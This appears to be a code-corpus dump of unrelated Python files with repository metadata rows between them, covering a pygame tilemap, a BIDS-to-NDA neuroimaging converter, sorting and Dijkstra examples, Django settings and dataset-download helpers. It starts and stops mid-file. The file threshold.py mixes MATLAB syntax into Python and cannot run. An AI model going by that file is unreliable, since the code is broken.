self.saver = tf.train.Saver(max_to_keep=self.config['max_to_keep'])
| 33.27907
| 144
| 0.621593
| 2,665
| 0.931167
| 0
| 0
| 0
| 0
| 0
| 0
| 1,122
| 0.392034
|
772b333423680d442d0295b333722d5a3ecb17ce
| 2,388
|
py
|
Python
|
tilemap.py
|
AI0702/Among-Us-clone
|
e75a1410c8bc9e82b41f2ab51deec373c8486e29
|
[
"Unlicense"
] | null | null | null |
tilemap.py
|
AI0702/Among-Us-clone
|
e75a1410c8bc9e82b41f2ab51deec373c8486e29
|
[
"Unlicense"
] | null | null | null |
tilemap.py
|
AI0702/Among-Us-clone
|
e75a1410c8bc9e82b41f2ab51deec373c8486e29
|
[
"Unlicense"
] | null | null | null |
import pygame as pg
from settings import *
import pytmx
class Map:
def __init__(self, filename):
self.data = []
with open(filename, 'rt') as f:
for line in f:
self.data.append(line.strip())
self.tilewidth = len(self.data[0])
self.tileheight = len(self.data)
self.width = self.tilewidth * TILESIZE
self.height = self.tileheight * TILESIZE
class TiledMap:
def __init__(self, filename):
tm = pytmx.load_pygame(filename, pixelalpha=True)
self.width = tm.width * tm.tilewidth
self.height = tm.height * tm.tileheight
self.tmxdata = tm
def render(self, surface):
# tile data
ti = self.tmxdata.get_tile_image_by_gid
# For each layer look for each tile and draw on surface
for layer in self.tmxdata.visible_layers:
if isinstance(layer, pytmx.TiledTileLayer):
for x, y, gid, in layer:
tile = ti(gid)
if tile:
surface.blit(tile, (x * self.tmxdata.tilewidth,
y * self.tmxdata.tileheight))
def make_map(self):
temp_surface = pg.Surface((self.width, self.height))
self.render(temp_surface)
return temp_surface
class Camera:
def __init__(self, width, height):
self.camera = pg.Rect(0, 0, width, height)
self.width = width
self.height = height
def apply(self, entity):
# Move rectangle according to camera coordinates are
return entity.rect.move(self.camera.topleft)
def apply_rect(self, rect):
return rect.move(self.camera.topleft)
def update(self, player_sprite):
# center player sprite on screen
x = -player_sprite.rect.x + int(WIDTH / 2)
y = -player_sprite.rect.y + int(HEIGHT / 2)
# Limit the map scrolling when sprite reaches end point of map
# For left boundary
x = min(0, x)
# For right boundary
x = max(-(self.width - WIDTH), x)
# For top boundary
y = min(0, y) # checks if y < 0
# For bottom boundary
y = max(-(self.height - HEIGHT), y)
# Adjust camera rectangle
self.camera = pg.Rect(x, y, self.width, self.height)
| 32.712329
| 74
| 0.562395
| 2,311
| 0.967755
| 0
| 0
| 0
| 0
| 0
| 0
| 347
| 0.14531
|
772bff3df8d91dc18f1f77932eab53991f3d258d
| 768
|
py
|
Python
|
exdir/utils/path.py
|
knc-neural-calculus/exdir
|
5448d41d60c0583892ab7bcf10342d8fb2f2a26b
|
[
"MIT"
] | 67
|
2017-10-25T11:08:59.000Z
|
2022-02-25T18:04:36.000Z
|
exdir/utils/path.py
|
knc-neural-calculus/exdir
|
5448d41d60c0583892ab7bcf10342d8fb2f2a26b
|
[
"MIT"
] | 107
|
2017-02-03T16:50:53.000Z
|
2022-03-18T04:18:14.000Z
|
exdir/utils/path.py
|
knc-neural-calculus/exdir
|
5448d41d60c0583892ab7bcf10342d8fb2f2a26b
|
[
"MIT"
] | 11
|
2018-09-11T11:05:44.000Z
|
2022-02-13T10:37:09.000Z
|
try:
import pathlib
except ImportError as e:
try:
import pathlib2 as pathlib
except ImportError:
raise e
def name_to_asserted_group_path(name):
path = pathlib.PurePosixPath(name)
if path.is_absolute():
raise NotImplementedError(
"Absolute paths are currently not supported and unlikely to be implemented."
)
if len(path.parts) < 1 and str(name) != ".":
raise NotImplementedError(
"Getting an item on a group with path '" + name + "' " +
"is not supported and unlikely to be implemented."
)
return path
def remove_root(name):
path = pathlib.PurePosixPath(name)
if path.is_absolute():
path = path.relative_to(path.root)
return path
| 24.774194
| 88
| 0.628906
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 173
| 0.22526
|
772c7aa25a9dad643c71fd03ef2e8fca224182d9
| 15,292
|
py
|
Python
|
bids2nda/main.py
|
Shotgunosine/BIDS2NDA
|
11d6d39ec1aafbe1e24cf8c3840c71e90aa43ee2
|
[
"Apache-2.0"
] | null | null | null |
bids2nda/main.py
|
Shotgunosine/BIDS2NDA
|
11d6d39ec1aafbe1e24cf8c3840c71e90aa43ee2
|
[
"Apache-2.0"
] | null | null | null |
bids2nda/main.py
|
Shotgunosine/BIDS2NDA
|
11d6d39ec1aafbe1e24cf8c3840c71e90aa43ee2
|
[
"Apache-2.0"
] | 1
|
2018-08-22T15:51:33.000Z
|
2018-08-22T15:51:33.000Z
|
#!/usr/bin/env python
#
# import modules used here -- sys is a very standard one
from __future__ import print_function
import argparse
import csv
import logging
import zipfile
from collections import OrderedDict
from glob import glob
import os
import sys
import nibabel as nb
import json
import pandas as pd
import numpy as np
# Gather our code in a main() function
from shutil import copy
def get_metadata_for_nifti(bids_root, path):
#TODO support .nii
sidecarJSON = path.replace(".nii.gz", ".json")
pathComponents = os.path.split(sidecarJSON)
filenameComponents = pathComponents[-1].split("_")
sessionLevelComponentList = []
subjectLevelComponentList = []
topLevelComponentList = []
ses = None;
sub = None;
for filenameComponent in filenameComponents:
if filenameComponent[:3] != "run":
sessionLevelComponentList.append(filenameComponent)
if filenameComponent[:3] == "ses":
ses = filenameComponent
else:
subjectLevelComponentList.append(filenameComponent)
if filenameComponent[:3] == "sub":
sub = filenameComponent
else:
topLevelComponentList.append(filenameComponent)
topLevelJSON = os.path.join(bids_root, "_".join(topLevelComponentList))
potentialJSONs = [topLevelJSON]
subjectLevelJSON = os.path.join(bids_root, sub, "_".join(subjectLevelComponentList))
potentialJSONs.append(subjectLevelJSON)
if ses:
sessionLevelJSON = os.path.join(bids_root, sub, ses, "_".join(sessionLevelComponentList))
potentialJSONs.append(sessionLevelJSON)
potentialJSONs.append(sidecarJSON)
merged_param_dict = {}
for json_file_path in potentialJSONs:
if os.path.exists(json_file_path):
param_dict = json.load(open(json_file_path, "r"))
merged_param_dict.update(param_dict)
return merged_param_dict
def dict_append(d, key, value):
if key in d:
d[key].append(value)
else:
d[key] = [value, ]
def run(args):
guid_mapping = dict([line.split(" - ") for line in open(args.guid_mapping).read().split("\n") if line != ''])
suffix_to_scan_type = {"dwi": "MR diffusion",
"bold": "fMRI",
#""MR structural(MPRAGE)",
"T1w": "MR structural (T1)",
"PD": "MR structural (PD)",
#"MR structural(FSPGR)",
"T2w": "MR structural (T2)",
"T2map": "MR structural (T2)",
"T2star": "MR: T2star",
"FLAIR": "MR: FLAIR",
"asl": "ASL",
"FLASH": "MR structural (FLASH)",
#PET;
#microscopy;
#MR structural(PD, T2);
#MR structural(B0 map);
#MR structural(B1 map);
#single - shell DTI;
#multi - shell DTI;
"epi": "Field Map",
"phase1": "Field Map",
"phase2": "Field Map",
"phasediff": "Field Map",
"magnitude1": "Field Map",
"magnitude2": "Field Map",
"fieldmap": "Field Map"
#X - Ray
}
units_dict = {"mm": "Millimeters",
"sec": "Seconds",
"msec": "Milliseconds"}
participants_df = pd.read_csv(os.path.join(args.bids_directory, "participants.tsv"), header=0, sep="\t")
participants_df['age'] = participants_df.age.astype(str).str.rstrip('Y').str.lstrip('0')
image03_dict = OrderedDict()
for file in glob(os.path.join(args.bids_directory, "sub-*", "*", "sub-*.nii.gz")) + \
glob(os.path.join(args.bids_directory, "sub-*", "ses-*", "*", "sub-*_ses-*.nii.gz")):
metadata = get_metadata_for_nifti(args.bids_directory, file)
bids_subject_id = os.path.split(file)[-1].split("_")[0][4:]
dict_append(image03_dict, 'subjectkey', guid_mapping[bids_subject_id])
dict_append(image03_dict, 'src_subject_id', bids_subject_id)
sub = file.split("sub-")[-1].split("_")[0]
if "ses-" in file:
ses = file.split("ses-")[-1].split("_")[0]
scans_file = (os.path.join(args.bids_directory, "sub-" + sub, "ses-" + ses, "sub-" + sub + "_ses-" + ses + "_scans.tsv"))
else:
scans_file = (os.path.join(args.bids_directory, "sub-" + sub, "sub-" + sub + "_scans.tsv"))
if os.path.exists(scans_file):
scans_df = pd.read_csv(scans_file, header=0, sep="\t")
else:
print("%s file not found - information about scan date required by NDA could not be found." % scans_file)
sys.exit(-1)
for (_, row) in scans_df.iterrows():
if file.endswith(row["filename"].replace("/", os.sep)):
date = row.acq_time
break
sdate = date.split("-")
ndar_date = sdate[1] + "/" + sdate[2].split("T")[0] + "/" + sdate[0]
dict_append(image03_dict, 'interview_date', ndar_date)
interview_age = int(round(float(participants_df[participants_df.participant_id == "sub-" + sub].age.values[0]), 0)*12)
dict_append(image03_dict, 'interview_age', interview_age)
sex = list(participants_df[participants_df.participant_id == "sub-" + sub].sex)[0]
dict_append(image03_dict, 'gender', sex)
dict_append(image03_dict, 'image_file', file)
suffix = file.split("_")[-1].split(".")[0]
if suffix == "bold":
description = suffix + " " + metadata["TaskName"]
dict_append(image03_dict, 'experiment_id', metadata.get("ExperimentID", args.experiment_id))
else:
description = suffix
dict_append(image03_dict, 'experiment_id', '')
dict_append(image03_dict, 'image_description', description)
dict_append(image03_dict, 'scan_type', suffix_to_scan_type[suffix])
dict_append(image03_dict, 'scan_object', "Live")
dict_append(image03_dict, 'image_file_format', "NIFTI")
dict_append(image03_dict, 'image_modality', "MRI")
dict_append(image03_dict, 'scanner_manufacturer_pd', metadata.get("Manufacturer", ""))
dict_append(image03_dict, 'scanner_type_pd', metadata.get("ManufacturersModelName", ""))
dict_append(image03_dict, 'scanner_software_versions_pd', metadata.get("SoftwareVersions", ""))
dict_append(image03_dict, 'magnetic_field_strength', metadata.get("MagneticFieldStrength", ""))
dict_append(image03_dict, 'mri_echo_time_pd', metadata.get("EchoTime", ""))
dict_append(image03_dict, 'flip_angle', metadata.get("FlipAngle", ""))
dict_append(image03_dict, 'receive_coil', metadata.get("ReceiveCoilName", ""))
plane = metadata.get("ImageOrientationPatient","")
get_orientation = lambda place: ['Axial','Coronal','Sagittal'][np.argmax(plane[:3])]
dict_append(image03_dict, 'image_orientation',get_orientation(plane))
dict_append(image03_dict, 'transformation_performed', 'Yes')
dict_append(image03_dict, 'transformation_type', 'BIDS2NDA')
nii = nb.load(file)
dict_append(image03_dict, 'image_num_dimensions', len(nii.shape))
dict_append(image03_dict, 'image_extent1', nii.shape[0])
dict_append(image03_dict, 'image_extent2', nii.shape[1])
dict_append(image03_dict, 'image_extent3', nii.shape[2])
if suffix == "bold":
extent4_type = "time"
elif suffix == "dwi":
extent4_type = "diffusion weighting"
else:
extent4_type = ""
dict_append(image03_dict, 'extent4_type', extent4_type)
dict_append(image03_dict, 'acquisition_matrix', "%g x %g" %(nii.shape[0], nii.shape[1]))
dict_append(image03_dict, 'image_resolution1', nii.header.get_zooms()[0])
dict_append(image03_dict, 'image_resolution2', nii.header.get_zooms()[1])
dict_append(image03_dict, 'image_resolution3', nii.header.get_zooms()[2])
dict_append(image03_dict, 'image_slice_thickness', nii.header.get_zooms()[2])
dict_append(image03_dict, 'photomet_interpret', metadata.get("global",{}).get("const",{}).get("PhotometricInterpretation","MONOCHROME2"))
if len(nii.shape) > 3:
image_extent4 = nii.shape[3]
image_resolution4 = nii.header.get_zooms()[3]
image_unit4 = units_dict[nii.header.get_xyzt_units()[1]]
if image_unit4 == "Milliseconds":
TR = nii.header.get_zooms()[3]/1000.
else:
TR = nii.header.get_zooms()[3]
else:
image_resolution4 = ""
image_unit4 = ""
image_extent4 = ""
TR = metadata.get("RepetitionTime", "")
slice_timing = metadata.get("SliceTiming", "")
dict_append(image03_dict, 'image_extent4', image_extent4)
dict_append(image03_dict, 'slice_timing', slice_timing)
dict_append(image03_dict, 'image_unit4', image_unit4)
dict_append(image03_dict, 'mri_repetition_time_pd', TR)
dict_append(image03_dict, 'image_resolution4', image_resolution4)
dict_append(image03_dict, 'image_unit1', units_dict[nii.header.get_xyzt_units()[0]])
dict_append(image03_dict, 'image_unit2', units_dict[nii.header.get_xyzt_units()[0]])
dict_append(image03_dict, 'image_unit3', units_dict[nii.header.get_xyzt_units()[0]])
dict_append(image03_dict, 'mri_field_of_view_pd', "%g x %g %s" % (nii.header.get_zooms()[0],
nii.header.get_zooms()[1],
units_dict[nii.header.get_xyzt_units()[0]]))
dict_append(image03_dict, 'patient_position', 'head first-supine')
if file.split(os.sep)[-1].split("_")[1].startswith("ses"):
visit = file.split(os.sep)[-1].split("_")[1][4:]
else:
visit = ""
dict_append(image03_dict, 'visit', visit)
if len(metadata) > 0 or suffix in ['bold', 'dwi']:
_, fname = os.path.split(file)
zip_name = fname.split(".")[0] + ".metadata.zip"
zip_path = os.path.join(args.output_directory, zip_name)
zip_path_exists = os.path.exists(zip_path)
if not zip_path_exists or (zip_path_exists and args.overwrite_zips):
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zipf:
zipf.writestr(fname.replace(".nii.gz", ".json"), json.dumps(metadata, indent=4, sort_keys=True))
if suffix == "bold":
#TODO write a more robust function for finding those files
events_file = file.split("_bold")[0] + "_events.tsv"
arch_name = os.path.split(events_file)[1]
if not os.path.exists(events_file):
task_name = file.split("_task-")[1].split("_")[0]
events_file = os.path.join(args.bids_directory, "task-" + task_name + "_events.tsv")
if os.path.exists(events_file):
zipf.write(events_file, arch_name)
dict_append(image03_dict, 'data_file2', zip_path)
dict_append(image03_dict, 'data_file2_type', "ZIP file with additional metadata from Brain Imaging "
"Data Structure (http://bids.neuroimaging.io)")
else:
dict_append(image03_dict, 'data_file2', "")
dict_append(image03_dict, 'data_file2_type', "")
if suffix == "dwi":
# TODO write a more robust function for finding those files
bvec_file = file.split("_dwi")[0] + "_dwi.bvec"
if not os.path.exists(bvec_file):
bvec_file = os.path.join(args.bids_directory, "dwi.bvec")
if os.path.exists(bvec_file):
dict_append(image03_dict, 'bvecfile', bvec_file)
else:
dict_append(image03_dict, 'bvecfile', "")
bval_file = file.split("_dwi")[0] + "_dwi.bval"
if not os.path.exists(bval_file):
bval_file = os.path.join(args.bids_directory, "dwi.bval")
if os.path.exists(bval_file):
dict_append(image03_dict, 'bvalfile', bval_file)
else:
dict_append(image03_dict, 'bvalfile', "")
if os.path.exists(bval_file) or os.path.exists(bvec_file):
dict_append(image03_dict, 'bvek_bval_files', 'Yes')
else:
dict_append(image03_dict, 'bvek_bval_files', 'No')
else:
dict_append(image03_dict, 'bvecfile', "")
dict_append(image03_dict, 'bvalfile', "")
dict_append(image03_dict, 'bvek_bval_files', "")
# all values of image03_dict should be the same length.
# Fail when this is not true instead of when the dataframe
# is created.
assert(len(set(map(len,image03_dict.values()))) ==1)
image03_df = pd.DataFrame(image03_dict)
with open(os.path.join(args.output_directory, "image03.txt"), "w") as out_fp:
out_fp.write('"image"\t"3"\n')
image03_df.to_csv(out_fp, sep="\t", index=False, quoting=csv.QUOTE_ALL)
def main():
class MyParser(argparse.ArgumentParser):
def error(self, message):
sys.stderr.write('error: %s\n' % message)
self.print_help()
sys.exit(2)
parser = MyParser(
description="BIDS to NDA converter.",
fromfile_prefix_chars='@')
# TODO Specify your real parameters here.
parser.add_argument(
"bids_directory",
help="Location of the root of your BIDS compatible directory",
metavar="BIDS_DIRECTORY")
parser.add_argument('-e', '--experiment_id', default=None,
help = ("Functional scans require an experiment_id. If ExperimentID is not"
" found in the scan metadata this value is used"))
parser.add_argument('-o', '--overwrite_zips', action='store_true',
help = ("If a conversion has already been performed, the default is "
"to avoid rewriting each zip file generated and instead just rewrite image03.txt"))
parser.add_argument(
"guid_mapping",
help="Path to a text file with participant_id to GUID mapping. You will need to use the "
"GUID Tool (https://ndar.nih.gov/contribute.html) to generate GUIDs for your participants.",
metavar="GUID_MAPPING")
parser.add_argument(
"output_directory",
help="Directory where NDA files will be stored",
metavar="OUTPUT_DIRECTORY")
args = parser.parse_args()
run(args)
print("Metadata extraction complete.")
if __name__ == '__main__':
main()
| 44.069164
| 145
| 0.587889
| 182
| 0.011902
| 0
| 0
| 0
| 0
| 0
| 0
| 3,850
| 0.251766
|
772cd907b931f0cbf42463265dfc425aa87bcb15
| 226
|
py
|
Python
|
ds2/sorting/bubblesort.py
|
aslisabanci/datastructures
|
f7952801245bc8d386a03d92a38121f558bdacca
|
[
"MIT"
] | 159
|
2017-10-02T22:03:14.000Z
|
2022-03-10T23:02:22.000Z
|
ds2/sorting/bubblesort.py
|
aslisabanci/datastructures
|
f7952801245bc8d386a03d92a38121f558bdacca
|
[
"MIT"
] | 9
|
2019-02-04T14:55:09.000Z
|
2021-06-05T13:30:28.000Z
|
ds2/sorting/bubblesort.py
|
aslisabanci/datastructures
|
f7952801245bc8d386a03d92a38121f558bdacca
|
[
"MIT"
] | 49
|
2017-09-29T17:51:16.000Z
|
2022-03-10T23:12:17.000Z
|
def bubblesort(L):
keepgoing = True
while keepgoing:
keepgoing = False
for i in range(len(L)-1):
if L[i]>L[i+1]:
L[i], L[i+1] = L[i+1], L[i]
keepgoing = True
| 25.111111
| 43
| 0.446903
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
772d6d4f45275295dcb92a649c3abaa349cebcf6
| 431
|
py
|
Python
|
src/features/threshold.py
|
HninPwint/nba-career-prediction
|
ffce32507cad2c4dd020c62cee7f33cf97c886f7
|
[
"MIT"
] | 1
|
2021-02-01T10:38:16.000Z
|
2021-02-01T10:38:16.000Z
|
src/features/threshold.py
|
HninPwint/nba-career-prediction
|
ffce32507cad2c4dd020c62cee7f33cf97c886f7
|
[
"MIT"
] | 3
|
2021-02-02T11:06:16.000Z
|
2021-02-06T11:44:19.000Z
|
src/features/threshold.py
|
HninPwint/nba-career-prediction
|
ffce32507cad2c4dd020c62cee7f33cf97c886f7
|
[
"MIT"
] | 4
|
2021-01-31T10:57:23.000Z
|
2021-02-02T06:16:35.000Z
|
class threshold:
def threshold(num, threshold):
if ( threshold < 0 ) || ( threshold >= 1 )
error('threshold input must be in the range [0,1]');
end
fractional = num - floor( num );
idx1 = fractional > threshold;
idx2 = fractional <= threshold;
difference = 1 - fractional;
result = num + ( difference .* idx1 ) - ( fractional .* idx2 );
return(result)
end
| 26.9375
| 71
| 0.556845
| 421
| 0.976798
| 0
| 0
| 0
| 0
| 0
| 0
| 44
| 0.102088
|
7730282673237879a35fb5efc177b9a2f6881b87
| 514
|
py
|
Python
|
cheers/settings/prod.py
|
bahattincinic/cheers
|
4443b23ad752c233743d71d1e035b757583a05f3
|
[
"MIT"
] | 3
|
2019-03-12T03:38:13.000Z
|
2021-03-15T16:48:49.000Z
|
cheers/settings/prod.py
|
bahattincinic/cheers
|
4443b23ad752c233743d71d1e035b757583a05f3
|
[
"MIT"
] | null | null | null |
cheers/settings/prod.py
|
bahattincinic/cheers
|
4443b23ad752c233743d71d1e035b757583a05f3
|
[
"MIT"
] | 2
|
2022-01-05T11:43:42.000Z
|
2022-03-16T00:05:19.000Z
|
from .base import *
import os
import dj_database_url
ALLOWED_HOSTS = ['*']
DEBUG = False
MIDDLEWARE += [
'whitenoise.middleware.WhiteNoiseMiddleware'
]
INSTALLED_APPS = [
'whitenoise.runserver_nostatic',
] + INSTALLED_APPS
DATABASES = {
'default': dj_database_url.config()
}
EMAIL_USE_TLS = True
EMAIL_HOST = os.environ.get('EMAIL_HOST')
EMAIL_HOST_USER = os.environ.get('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.environ.get('EMAIL_HOST_PASSWORD')
EMAIL_PORT = os.environ.get('EMAIL_PORT')
| 17.133333
| 59
| 0.743191
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 149
| 0.289883
|
77319ed1468248ddab354a491c37c6712455692a
| 1,175
|
py
|
Python
|
week2/problem1.py
|
jgathogo/python_level_1
|
129411fe42aa5ef0e32d9d3d9cf2ad90e182e455
|
[
"Apache-2.0"
] | 1
|
2021-06-13T09:06:24.000Z
|
2021-06-13T09:06:24.000Z
|
week2/problem1.py
|
jgathogo/python_level_1
|
129411fe42aa5ef0e32d9d3d9cf2ad90e182e455
|
[
"Apache-2.0"
] | null | null | null |
week2/problem1.py
|
jgathogo/python_level_1
|
129411fe42aa5ef0e32d9d3d9cf2ad90e182e455
|
[
"Apache-2.0"
] | null | null | null |
import os
import sys
"""
Notes:
- It's great that you've used functions even though we haven't reached that part of the course.
Also, the naming of the function is clear and a good variable name.
- Typically, the docstring for the function starts immediately after the triple quote otherwise we
introduce a newline (\n) in the documentation, which doesn't look good. I've corrected it below.
- The 'return' variable in the docstring is not correct since your program actually returns None (you can test this)
- Trivial point: to preserve the order of modules, name them problem0.py,...,problem9.py; this way they will always appear in order
- Feel free to include additional testing modules if you need to though you don't have to commit them to the repo.
"""
def print_name_age():
"""Ask user name and age and print out the result"""
name = input("Please enter your name: ")
age = input("Please enter your age in years: ")
print(f"Your name is {name} and you are {age} years old")
def main():
v = print_name_age()
# print(f"the return value of 'print_name_age()' is {v}")
return os.EX_OK
if __name__ == "__main__":
sys.exit(main())
| 37.903226
| 131
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 970
| 0.825532
|
7731f6b63900ac030b3e3491a417310c77c7bf81
| 2,313
|
py
|
Python
|
Graphs/dijkstra_algorithm.py
|
hemraj4545/Data-Structures-and-Algorithms-in-Python
|
633062369ceb3c9c1627f7e826243be7a84d4a7e
|
[
"MIT"
] | 3
|
2019-10-05T07:11:06.000Z
|
2021-08-04T12:15:39.000Z
|
Graphs/dijkstra_algorithm.py
|
Satyagovind/Data-Structures-and-Algorithms-in-Python
|
e13becf63097e86dc073bc2de3b8d5586623743d
|
[
"MIT"
] | 5
|
2019-10-03T08:51:34.000Z
|
2020-11-19T11:49:13.000Z
|
Graphs/dijkstra_algorithm.py
|
Satyagovind/Data-Structures-and-Algorithms-in-Python
|
e13becf63097e86dc073bc2de3b8d5586623743d
|
[
"MIT"
] | 6
|
2019-09-25T17:59:34.000Z
|
2021-07-17T05:58:14.000Z
|
"""
>>> G = Graph(6)
>>> G.insert(0, 1, 3)
>>> G.insert(0, 2, 7)
>>> G.insert(0, 4, 8)
>>> G.insert(0, 5, 1)
>>> G.insert(1, 2, 2)
>>> G.insert(1, 4, 13)
>>> G.insert(2, 3, 15)
>>> G.insert(3, 5, 17)
>>> G.insert(4, 5, 9)
>>> G.dijkstra(0)[0]
[0, 3, 5, 20, 8, 1]
>>> G.shortest_distance(1, 5)
[1, 4, 5]
"""
"""
Lazy implementation of Dijkstra's Algorithm.
In this implementation we Lazily check all the (node, distance) pair
even if a better distance for given node exists(i.e. duplicates exists).
Priority queue which is always sorted in ascending order of distance.
"""
from sys import maxsize
import heapq
from collections import defaultdict as dd
class Graph:
def __init__(self, vertices):
# Using defaultdict to avoid key error
self.adjmat = dd(dict)
self.vertices = vertices
for i in range(vertices):
self.adjmat[i] = dd(int)
def insert(self, u, v, w=1):
# Vertex from u to v because it is a directed graph
self.adjmat[u][v] = w
def dijkstra(self, source):
vis = [False for i in range(self.vertices)]
dist = [maxsize for i in range(self.vertices)]
prev = [None for i in range(self.vertices)]
dist[source] = 0
pq = list()
pq.append((0, source))
while len(pq) > 0:
# Pop the node with shortest distance
mindist, node = heapq.heappop(pq)
vis[node] = True
if dist[node] < mindist:
continue
for i in self.adjmat[node].keys():
if vis[i]:
continue
new_dist = dist[node] + self.adjmat[node][i] # Add present distance with weight of the edge
if new_dist < dist[i]: # If better path is found
prev[i] = node
dist[i] = new_dist
pq.append((new_dist, i))
return dist, prev # Return minimum distance of each node from source.
def shortest_distance(self, s, e):
dist, prev = self.dijkstra(s)
path = list()
if dist[e] == maxsize:
return path
i = e
while i is not None:
path.append(i)
i = prev[i]
return path[::-1]
| 30.84
| 108
| 0.531345
| 1,585
| 0.685257
| 0
| 0
| 0
| 0
| 0
| 0
| 890
| 0.384782
|
7732a52cf70bb1c65299ac307a32800ed068e230
| 854
|
py
|
Python
|
src/7/accessing_variables_defined_inside_a_closure/example2.py
|
tuanavu/python-gitbook
|
948a05e065b0f40afbfd22f697dff16238163cde
|
[
"MIT"
] | 14
|
2017-05-20T04:06:46.000Z
|
2022-01-23T06:48:45.000Z
|
src/7/accessing_variables_defined_inside_a_closure/example2.py
|
tuanavu/python-gitbook
|
948a05e065b0f40afbfd22f697dff16238163cde
|
[
"MIT"
] | 1
|
2021-06-10T20:17:55.000Z
|
2021-06-10T20:17:55.000Z
|
src/7/accessing_variables_defined_inside_a_closure/example2.py
|
tuanavu/python-gitbook
|
948a05e065b0f40afbfd22f697dff16238163cde
|
[
"MIT"
] | 15
|
2017-03-29T17:57:33.000Z
|
2021-08-24T02:20:08.000Z
|
# Example of faking classes with a closure
import sys
class ClosureInstance:
def __init__(self, locals=None):
if locals is None:
locals = sys._getframe(1).f_locals
# Update instance dictionary with callables
self.__dict__.update((key,value) for key, value in locals.items()
if callable(value) )
# Redirect special methods
def __len__(self):
return self.__dict__['__len__']()
# Example use
def Stack():
items = []
def push(item):
items.append(item)
def pop():
return items.pop()
def __len__():
return len(items)
return ClosureInstance()
if __name__ == '__main__':
s = Stack()
print(s)
s.push(10)
s.push(20)
s.push('Hello')
print(len(s))
print(s.pop())
print(s.pop())
print(s.pop())
| 20.829268
| 73
| 0.580796
| 406
| 0.47541
| 0
| 0
| 0
| 0
| 0
| 0
| 150
| 0.175644
|
7732d1b5ac77c6e2332d3fe38f546a806fa00262
| 434
|
py
|
Python
|
miniamf/adapters/_array.py
|
zackw/pyamf
|
59ca667e37a20d8464b098f4ebec89de6f319413
|
[
"MIT"
] | 14
|
2017-05-04T17:22:30.000Z
|
2020-01-23T06:30:19.000Z
|
miniamf/adapters/_array.py
|
zackw/pyamf
|
59ca667e37a20d8464b098f4ebec89de6f319413
|
[
"MIT"
] | 1
|
2020-05-16T06:28:02.000Z
|
2020-05-16T06:28:02.000Z
|
miniamf/adapters/_array.py
|
zackw/pyamf
|
59ca667e37a20d8464b098f4ebec89de6f319413
|
[
"MIT"
] | 6
|
2017-09-13T19:30:35.000Z
|
2021-07-26T14:41:57.000Z
|
# Copyright (c) The PyAMF Project.
# See LICENSE.txt for details.
"""
U{array<http://docs.python.org/library/array.html>} adapter module.
Will convert all array.array instances to a python list before encoding. All
type information is lost (but degrades nicely).
@since: 0.5
"""
from __future__ import absolute_import
import array
import miniamf
from miniamf.adapters import util
miniamf.add_type(array.ArrayType, util.to_list)
| 21.7
| 76
| 0.774194
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 278
| 0.640553
|
77331bed5a7248d07a4fb3851abb1699ae7ce662
| 929
|
py
|
Python
|
KristaBackup/common/schemes/__init__.py
|
javister/krista-backup
|
f8852c20afdf483e842ff22497bdd80eedc30c78
|
[
"Apache-2.0"
] | 7
|
2020-07-28T06:53:02.000Z
|
2022-03-18T05:23:03.000Z
|
KristaBackup/common/schemes/__init__.py
|
javister/krista-backup
|
f8852c20afdf483e842ff22497bdd80eedc30c78
|
[
"Apache-2.0"
] | 1
|
2020-11-25T16:13:26.000Z
|
2020-11-25T16:13:26.000Z
|
KristaBackup/common/schemes/__init__.py
|
javister/krista-backup
|
f8852c20afdf483e842ff22497bdd80eedc30c78
|
[
"Apache-2.0"
] | 1
|
2020-07-28T13:47:09.000Z
|
2020-07-28T13:47:09.000Z
|
from .scheme_factory import SchemeFactory
from .schemes import schemes
_default_scheme_id = 'default'
def get_scheme(scheme_id=None):
"""Возвращает схему по scheme_id.
Args:
scheme_id: Строка, уникальное имя схемы.
Returns:
Scheme или None, если схемы с scheme_id не существует.
"""
global _default_scheme_id
if not scheme_id:
scheme_id = _default_scheme_id
scheme = schemes.get(scheme_id, None)
if scheme:
return scheme()
return None
def update_scheme(name, new_scheme):
schemes[name] = new_scheme
def set_default(scheme_id):
global _default_scheme_id
_default_scheme_id = scheme_id
def get_scheme_by_config(scheme_config):
"""Возвращает схему по конфигурации.
Returns:
Сформированную схему
Raises:
Если схема с текущим scheme_id уже существует.
"""
return SchemeFactory.from_dict(scheme_config)
| 19.765957
| 62
| 0.70183
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 488
| 0.4548
|
77342baf47053521f8e1f5ab72083d2e5edeca75
| 4,425
|
py
|
Python
|
data/utils.py
|
dojoteef/synst
|
a1842682cf757e8a501cd9cee16f20e1a14158f1
|
[
"BSD-3-Clause"
] | 81
|
2019-06-03T18:04:22.000Z
|
2022-02-04T14:20:49.000Z
|
data/utils.py
|
dojoteef/synst
|
a1842682cf757e8a501cd9cee16f20e1a14158f1
|
[
"BSD-3-Clause"
] | 7
|
2019-08-02T06:41:20.000Z
|
2020-07-31T18:31:48.000Z
|
data/utils.py
|
dojoteef/synst
|
a1842682cf757e8a501cd9cee16f20e1a14158f1
|
[
"BSD-3-Clause"
] | 5
|
2019-06-14T04:00:25.000Z
|
2020-09-14T02:50:09.000Z
|
'''
Utilities useful for datasets
'''
import os
from functools import partial
from urllib.request import urlretrieve
import requests
from tqdm import tqdm
from torch.utils.data.dataloader import DataLoader
from torch.utils.data.sampler import BatchSampler, RandomSampler, SequentialSampler
from data.sampler import SequenceLengthSampler
# See https://github.com/tqdm/tqdm#hooks-and-callbacks
class DownloadProgressBar(tqdm):
"""Provides `update_to(n)` which uses `tqdm.update(delta_n)`."""
def __init__(self, filename):
''' '''
super(DownloadProgressBar, self).__init__(
unit='B', unit_scale=True, miniters=1, desc=filename)
def update_to(self, blocks=1, block_size=1, total_size=None):
"""
blocks : int, optional
Number of blocks transferred so far [default: 1].
block_size : int, optional
Size of each block (in tqdm units) [default: 1].
total_size : int, optional
Total size (in tqdm units). If [default: None] remains unchanged.
"""
if total_size:
self.total = total_size
self.update(blocks * block_size - self.n) # will also set self.n = blocks * block_size
def maybe_download(filepath, url):
''' Download the requested URL to the requested path if it does not already exist '''
directory = os.path.dirname(filepath)
if not os.path.exists(directory):
os.makedirs(directory)
if os.path.exists(filepath):
return filepath
if 'drive.google.com' in url:
